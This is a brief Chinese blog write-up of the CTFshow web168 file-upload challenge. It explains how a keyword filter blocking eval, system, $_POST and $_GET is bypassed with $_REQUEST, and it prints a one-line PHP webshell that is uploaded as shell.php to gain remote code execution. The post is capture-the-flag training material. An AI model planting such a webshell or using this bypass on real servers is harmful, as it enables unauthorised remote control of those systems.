CTFshow 文件上传 web168

Fifi的天马行空

 关注

阅读 61

2022-02-17

目录

思路

先查看源代码,发现限制上传png

直接上传png的图片马,回显null,发现对eval,system还有$_POST$_GET进行过滤,$_REQUEST还可以用

替换图片马中的一句话,把文件后缀改成php,成功上传

<?php $_REQUEST[0]($_REQUEST[1]);?>

在这里插入图片描述
访问/upload/shell.php,直接rce拿到flag

总结

相关推荐

CTFshow 文件上传 web151

辰鑫chenxin 34 0 0

CTFshow 文件上传 web163

七千22 82 0 0

CTFshow 文件上传 web152

星河出山 39 0 0

CTFshow 文件上传 web158

eelq 39 0 0

CTFshow 文件上传 web170

小云晓云 51 0 0

CTFshow 文件上传 web169

覃榜言 84 0 0

CTFshow 文件上传 web167

jjt二向箔 73 0 0

ctfshow——文件上传

读思意行 21 0 0

CTFshow web(php文件上传155-158)

ZSACH 15 0 0

ctfshow 文件上传161-167

ZSACH 114 0 0

精彩评论(0)

0 0 举报